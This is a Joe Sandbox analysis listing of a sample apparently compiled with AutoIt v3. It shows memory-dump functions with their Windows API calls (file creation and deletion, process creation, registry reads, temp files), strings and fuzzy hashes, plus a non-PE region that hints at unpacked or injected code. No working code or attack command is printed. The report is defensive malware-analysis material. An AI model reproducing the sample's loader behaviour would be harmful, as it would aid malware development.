Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: 04d41167e67e275ebfb0109ca99bf28578f73b22692afe985c0f6afa7f807d32
Instruction ID: 79ae510ede08cfd2f295b82e04d1973dec5b227a99823283e446ffcbb420f6ff
Opcode Fuzzy Hash: 04d41167e67e275ebfb0109ca99bf28578f73b22692afe985c0f6afa7f807d32
Instruction Fuzzy Hash: 70413B3926420CE7DB183F78AD1FF793619EB06344F14011AFB26862A2CB71DA64D771

Function 001FDFD0 Relevance: 15.4, APIs: 2, Strings: 6, Instructions: 1414COMMON

Download Yara Rule

Strings

D%,, xrefs: 00242FDA
D%,, xrefs: 0024302D
D%,, xrefs: 001FE1E0
D%,D%,, xrefs: 001FE27E
Variable must be of type 'Object'., xrefs: 002432B7
D%,, xrefs: 001FE4B1

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID:
String ID: D%,$D%,$D%,$D%,$D%,D%,$Variable must be of type 'Object'.
API String ID: 0-630831411
Opcode ID: 353d8f41a0499b7747c8a7fb4ca2e6b2b205ecb08f28a6c29a8343fea8d98986
Instruction ID: c265fb60b08d334c03e2f75e80fa3261f1a2abd2fec6198055cee8ef0d424931
Opcode Fuzzy Hash: 353d8f41a0499b7747c8a7fb4ca2e6b2b205ecb08f28a6c29a8343fea8d98986
Instruction Fuzzy Hash: ACC28975A00209CFCB28CF58D884ABDB7F1BF18310F258169EA06AB3A1D775ED51CB91

Function 00E59928 Relevance: 10.7, APIs: 7, Instructions: 151
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00E5996D

Memory Dump Source

Source File: 00000000.00000002.2383571784.0000000000E59000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E59000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e59000_eLo1khn7DQ.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
Instruction ID: 661035a18dad7628550703502b802602a03bc9ca8ead54c62055f0b28cf66374
Opcode Fuzzy Hash: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
Instruction Fuzzy Hash: 4451E875A50208FFEF20DFA4CC49FDE7778AF48701F508958FA0AEB181DA749A449B60

Function 001F2C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 001F2C91
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 001F2CB2
ShowWindow.USER32(00000000,?,?,?,?,?,?,001F1CAD,?), ref: 001F2CC6
ShowWindow.USER32(00000000,?,?,?,?,?,?,001F1CAD,?), ref: 001F2CCF

Strings

edit, xrefs: 001F2CAC
AutoIt v3, xrefs: 001F2C89, 001F2C8E, 001F2C8F

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: c318b91d86bc2bf0f5fc13c5ef2192e179db6e9d7d0e1e69f552411bb6a81a56
Instruction ID: d42ca21c8e4055b251cc62c693f31d5847a3f39da3c443a7573056e20281fd99
Opcode Fuzzy Hash: c318b91d86bc2bf0f5fc13c5ef2192e179db6e9d7d0e1e69f552411bb6a81a56
Instruction Fuzzy Hash: EDF0B2796412D07AEB211B27BC0EE776EBDDBCBF64B11009AF900A35A1C6751860DAB0

Function 00262947 Relevance: 7.8, APIs: 5, Instructions: 313
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00262C05
DeleteFileW.KERNEL32(?), ref: 00262C87
CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00262C9D
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00262CAE
DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00262CC0

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: File$Delete$Copy
String ID:
API String ID: 3226157194-0
Opcode ID: 0ffbb97535e73a98f4f234b9f216e3a24e10b50145da1fa33397370f31a2c821
Instruction ID: 5b1621b6207c0afd83a57e0b7e4b61cb772136a79b64f1f47e85dba39c78092b
Opcode Fuzzy Hash: 0ffbb97535e73a98f4f234b9f216e3a24e10b50145da1fa33397370f31a2c821
Instruction Fuzzy Hash: E9B15D7191051DEBDF21DFA4CC85EEEB7BDEF58350F1040A6FA09A6141EB309A988F61

Function 00E5B3A8 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 167
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00E5B298: Sleep.KERNELBASE(000001F4), ref: 00E5B2A9

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00E5B510

Strings

JWHEPTRN7TLT2691H72MDS6RKFH, xrefs: 00E5B593, 00E5B596

Memory Dump Source

Source File: 00000000.00000002.2383571784.0000000000E59000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E59000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e59000_eLo1khn7DQ.jbxd

Similarity

API ID: CreateFileSleep
String ID: JWHEPTRN7TLT2691H72MDS6RKFH
API String ID: 2694422964-2340818311
Opcode ID: a9b9d45c4bb3d27a0aaa075567bfffd76a125864857a876ca2f8c20716952c95
Instruction ID: a47b8b1da3bd8e8dd5068da6711d76857dcb042a6d24af8bf1da7858a4f4e07a
Opcode Fuzzy Hash: a9b9d45c4bb3d27a0aaa075567bfffd76a125864857a876ca2f8c20716952c95
Instruction Fuzzy Hash: CF71B430D04288DBEF11DBB4C844BEEBBB5AF19305F044599E6487B2C1D7BA0B49CB66

Function 001F3B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,001F3B0F,SwapMouseButtons,00000004,?), ref: 001F3B40
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,001F3B0F,SwapMouseButtons,00000004,?), ref: 001F3B61
RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,001F3B0F,SwapMouseButtons,00000004,?), ref: 001F3B83

Strings

Control Panel\Mouse, xrefs: 001F3B3E

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: bf8c14e85466e3346e69e9d472f1f989d61fe61dac1f6499468394d388ac71d6
Instruction ID: e72d71487164555262ba6cdcce2bfa8b74fe9bd599cf2b4a036d8411048aa717
Opcode Fuzzy Hash: bf8c14e85466e3346e69e9d472f1f989d61fe61dac1f6499468394d388ac71d6
Instruction Fuzzy Hash: 90112AB5511208FFDB21CFA5DC58ABEB7B8EF04784B10445AA916D7210D3319E409760

Function 001F3923 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94windowCOMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 002333A2

Part of subcall function 001F6B57: _wcslen.LIBCMT ref: 001F6B6A

Shell_NotifyIconW.SHELL32(00000001,?), ref: 001F3A04

Strings

Line: , xrefs: 002333EB

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: IconLoadNotifyShell_String_wcslen
String ID: Line:
API String ID: 2289894680-1585850449
Opcode ID: 4d645b3fdae1180176c6a63fb8a85768b114b536da1c053d1171b097f8c7d59b
Instruction ID: 50c1e3233d2db038ef805b5ac6bcd9a330fe61a67557a477c1e169c2f2192ca8
Opcode Fuzzy Hash: 4d645b3fdae1180176c6a63fb8a85768b114b536da1c053d1171b097f8c7d59b
Instruction Fuzzy Hash: DB31E571408309AAC325EB10EC4AFFBB3E8BF51354F10456AF6A983091DB709B68C7C2

Function 001F2DE3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

GetOpenFileNameW.COMDLG32(?), ref: 00232C8C

Part of subcall function 001F3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,001F3A97,?,?,001F2E7F,?,?,?,00000000), ref: 001F3AC2

Part of subcall function 001F2DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 001F2DC4

Strings

X, xrefs: 00232C5A
`e+, xrefs: 00232C85

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen
String ID: X$`e+
API String ID: 779396738-502327036
Opcode ID: 5f4880e30c2df54d3bba32f2ac75f5843a14725ae5d518a640c74652a06778c4
Instruction ID: 2e936bffcec02d5fe2331829c1d238ad0d87223d62d9466e1e7b436a21b8164c
Opcode Fuzzy Hash: 5f4880e30c2df54d3bba32f2ac75f5843a14725ae5d518a640c74652a06778c4
Instruction Fuzzy Hash: 0B21A571A1029C9FCF11DF94C849BEE7BF8AF59304F10405AE505B7241DBB85A998F61

Function 0020FDDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 00210668

Part of subcall function 002132A4: RaiseException.KERNEL32(?,?,?,0021068A,?,002C1444,?,?,?,?,?,?,0021068A,001F1129,002B8738,001F1129), ref: 00213304

__CxxThrowException@8.LIBVCRUNTIME ref: 00210685

Strings

Unknown exception, xrefs: 00210692

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: Unknown exception
API String ID: 3476068407-410509341
Opcode ID: 435161a19d748697d78118967e00e7a11b8c0561c2fb0ddaeb53c90cdd47c470
Instruction ID: 43c45cd3a4dd0a94506a180b95e5fda52a5abc33dba2c8188618e1750612d27e
Opcode Fuzzy Hash: 435161a19d748697d78118967e00e7a11b8c0561c2fb0ddaeb53c90cdd47c470
Instruction Fuzzy Hash: 17F0C83492030D77CB14BA64DC86CDD77ED6E20350B604171B918959D2EFB1DAF5C9C0

Function 00E5A008 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 00E5A04D
ExitProcess.KERNEL32(00000000), ref: 00E5A06C

Strings

D, xrefs: 00E5A019

Memory Dump Source

Source File: 00000000.00000002.2383571784.0000000000E59000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E59000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e59000_eLo1khn7DQ.jbxd

Similarity

API ID: Process$CreateExit
String ID: D
API String ID: 126409537-2746444292
Opcode ID: 359d21864460d0aa6716f03c0fb9f93045a71ab212c145842ddc1246808d9d7c
Instruction ID: 04469687c046f15f2b56516e83c780c99efe80697a7ed6c9c43e471ca3c600e6
Opcode Fuzzy Hash: 359d21864460d0aa6716f03c0fb9f93045a71ab212c145842ddc1246808d9d7c
Instruction Fuzzy Hash: 53F0E1B154024CABDB60EFE0CC49FEE7779BF04701F548918BB19AA184DB7495488761

Function 00263017 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?,00000001), ref: 0026302F
GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00263044

Strings

aut, xrefs: 00263038

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: 72cf064d7dfcd39c092b55ad5a472d7e7efe3fd3146ea9ac263b589d314ae2b8
Instruction ID: a59a971cb872f4f5469e9273cd2cfcc0a8ac52be90449852ad9ab9cbcb957c24
Opcode Fuzzy Hash: 72cf064d7dfcd39c092b55ad5a472d7e7efe3fd3146ea9ac263b589d314ae2b8
Instruction Fuzzy Hash: 8BD05E7650132867DA20A7A4AC0EFCB3A6CDB05750F0002A1BA55E20D5DBB4A984CBE0

Function 00277F59 Relevance: 4.9, APIs: 3, Instructions: 430COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 002782F5
TerminateProcess.KERNEL32(00000000), ref: 002782FC
FreeLibrary.KERNEL32(?,?,?,?), ref: 002784DD

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: Process$CurrentFreeLibraryTerminate
String ID:
API String ID: 146820519-0
Opcode ID: f2b37277fa89f16973fd4bb7eeae0b0709cfdb2c128dfbf49a3c20133437e9e5
Instruction ID: 64d086a767251aef8332ffc35b4ff45ff562072fe1b33030b98f591d0f75f58f
Opcode Fuzzy Hash: f2b37277fa89f16973fd4bb7eeae0b0709cfdb2c128dfbf49a3c20133437e9e5
Instruction Fuzzy Hash: F8127C71A183419FC714DF28C488B2ABBE1FF84318F14895DE9898B292DB71ED55CF92

Function 00225AA9 Relevance: 4.7, APIs: 3, Instructions: 186COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7da7e3528eb9c9edd1bfe91be9fb7acd5fa89c3e7f4c80e566dfbc86072cda70
Instruction ID: 9f9b4c38b9a1e7e94774c2f6c73ae484071aa2341cc53fb11dd69f7c6bf5ed9e
Opcode Fuzzy Hash: 7da7e3528eb9c9edd1bfe91be9fb7acd5fa89c3e7f4c80e566dfbc86072cda70
Instruction Fuzzy Hash: B4510271D3063ABBCB209FE4E949FEEBBB4AF05310F10801AF405A7291D6759961CB61

Function 001F10F3 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON

Download Yara Rule

APIs

Part of subcall function 001F1BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 001F1BF4
Part of subcall function 001F1BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 001F1BFC
Part of subcall function 001F1BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 001F1C07
Part of subcall function 001F1BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 001F1C12
Part of subcall function 001F1BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 001F1C1A
Part of subcall function 001F1BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 001F1C22

Part of subcall function 001F1B4A: RegisterWindowMessageW.USER32(00000004,?,001F12C4), ref: 001F1BA2

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 001F136A
OleInitialize.OLE32 ref: 001F1388
CloseHandle.KERNEL32(00000000,00000000), ref: 002324AB

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 1986988660-0
Opcode ID: ad7a4569fc934e16dd4a9b4dae428734c0acb7ab725e436a83052777677c4c91
Instruction ID: ea15d4c88452d2bcc5018964db6f05a74d9cbf6f8548da463c898e865481d915
Opcode Fuzzy Hash: ad7a4569fc934e16dd4a9b4dae428734c0acb7ab725e436a83052777677c4c91
Instruction Fuzzy Hash: 2171A0B49152048ED398EF79B94FE653AE4FB9A3847A4826ED10AC7363E7308435CF54

Function 0025C161 Relevance: 4.6, APIs: 3, Instructions: 74timewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 001F3923: Shell_NotifyIconW.SHELL32(00000001,?), ref: 001F3A04

Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0025C259
KillTimer.USER32(?,00000001,?,?), ref: 0025C261
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0025C270

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: IconNotifyShell_Timer$Kill
String ID:
API String ID: 3500052701-0
Opcode ID: a43f8185b51e7d56a5fc4d1d03c3595f26b9049a60500837388b5bdc9545652c
Instruction ID: d9698e7bdcf5855e87198cdaded83ccfab644ad7ded76a9d98224f118e6ad910
Opcode Fuzzy Hash: a43f8185b51e7d56a5fc4d1d03c3595f26b9049a60500837388b5bdc9545652c
Instruction Fuzzy Hash: 3131F770914344AFEB328F649859BE7BBECAF02309F10009EDADE97241D3745A88CB55

Function 002286AE Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE

Download Yara Rule

APIs

CloseHandle.KERNELBASE(00000000,00000000,?,?,002285CC,?,002B8CC8,0000000C), ref: 00228704
GetLastError.KERNEL32(?,002285CC,?,002B8CC8,0000000C), ref: 0022870E
__dosmaperr.LIBCMT ref: 00228739

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: CloseErrorHandleLast__dosmaperr
String ID:
API String ID: 2583163307-0
Opcode ID: 7b94aff8cc1b74f816949e3dfaf508d2cf89938eaabd4bf6429fc35c223eb8a8
Instruction ID: 21f10ec09fe1f6370360b281d6fc817ed2c630b641b73137c45e4f15f55d90d9
Opcode Fuzzy Hash: 7b94aff8cc1b74f816949e3dfaf508d2cf89938eaabd4bf6429fc35c223eb8a8
Instruction Fuzzy Hash: 83016632A3727036D220A6F4B849B7E674D4B92774F384199F8188B0D3DEB0CCE18690

Function 001FDB38 Relevance: 4.5, APIs: 3, Instructions: 29windowsleepCOMMON

Download Yara Rule

APIs

TranslateMessage.USER32(?), ref: 001FDB7B
DispatchMessageW.USER32(?), ref: 001FDB89
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 001FDB9F
Sleep.KERNEL32(0000000A), ref: 001FDBB1
TranslateAcceleratorW.USER32(?,?,?), ref: 00241CC9

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: Message$Translate$AcceleratorDispatchPeekSleep
String ID:
API String ID: 3288985973-0
Opcode ID: c91046fc211b61607d1abe65eec90afd9d95f460608a338259e4232051ea5bc1
Instruction ID: ff7018dd837298f5bd451a9abd4267a5b961ebfb0dd2b773c039a21312d7565d
Opcode Fuzzy Hash: c91046fc211b61607d1abe65eec90afd9d95f460608a338259e4232051ea5bc1
Instruction Fuzzy Hash: 5FF05E306193459BEB34CB60EC89FBA73ADEB46350F504A19E60A830D0DB3094A8CB26

Function 00262FD8 Relevance: 4.5, APIs: 3, Instructions: 27filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,00262CD4,?,?,?,00000004,00000001), ref: 00262FF2
